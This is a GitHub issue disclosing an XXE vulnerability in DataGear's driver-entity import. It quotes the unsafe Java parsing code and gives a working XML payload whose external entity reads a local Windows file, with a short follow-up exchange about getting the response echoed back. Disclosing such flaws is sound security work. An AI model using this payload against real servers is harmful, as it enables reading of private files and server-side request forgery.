Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

XML External Entity (XXE) Vulnerability in /driverEntity/uploadImportFile #34

Open
Z4cSec opened this issue Oct 22, 2024 · 2 comments
Open

Comments

@Z4cSec
Copy link

Z4cSec commented Oct 22, 2024

Description

DataGear is an open-source and free data visualization analysis platform that allows you to freely create any kind of data dashboard you want, supporting access to multiple data sources such as SQL, CSV, Excel, HTTP interface, JSON, etc.

DataGear 5.1.0 and below has a XXE vulnerability, which can exploit this vulnerability disclosing local files in the file system or perform a Server-Side Request Forgery (SSRF).


Unsafe Code

The org/datagear/connection/XmlDriverEntityManager.java#readDriverEntities function parses xml directly without disable DTD (Document Type Definition), and the xml is controllable, leading to XML External Entity.

@Override
protected List<DriverEntity> readDriverEntities(Reader in) throws DriverEntityManagerException
{
    List<DriverEntity> driverEntities = new ArrayList<DriverEntity>();

    DocumentBuilderFactory documentBuilderFactory;
    DocumentBuilder documentBuilder;
    Document document;

    try
    {
       documentBuilderFactory = DocumentBuilderFactory.newInstance();
       documentBuilder = documentBuilderFactory.newDocumentBuilder();
       document = documentBuilder.parse(new InputSource(in));

Steps to Reproduce

Upload a zip file containing the driverEntityInfo.xml file, with the content of driverEntityInfo.xml as follows:

<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<!DOCTYPE driver-entities [
<!ENTITY edward SYSTEM "file:///C:/windows/win.ini">
]>
<driver-entities>
    <driver-entity>
        <id>&edward;</id>
        <driver-class-name>com.mysql.jdbc.Driver</driver-class-name>
    </driver-entity>
    <driver-entity>
        <id>mysql-jre8</id>
        <driver-class-name>com.mysql.cj.jdbc.Driver</driver-class-name>
    </driver-entity>
    <driver-entity>
        <id>oracle</id>
        <driver-class-name>oracle.jdbc.OracleDriver</driver-class-name>
    </driver-entity>
</driver-entities>

After sending the request, you can see the returned value after XML parsing
cut

@byXewl
Copy link

byXewl commented Oct 23, 2024

image
我改的url请求怎么没有回显啊

@Z4cSec
Copy link
Author

Z4cSec commented Oct 23, 2024

image 我改的url请求怎么没有回显啊

To upload a zip file containing a driverEntityInfo.xml. If the format is incorrect, it will not be parsed.

@Z4cSec Z4cSec closed this as not planned Won't fix, can't repro, duplicate, stale Oct 23, 2024
@Z4cSec Z4cSec reopened this Oct 23, 2024
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

2 participants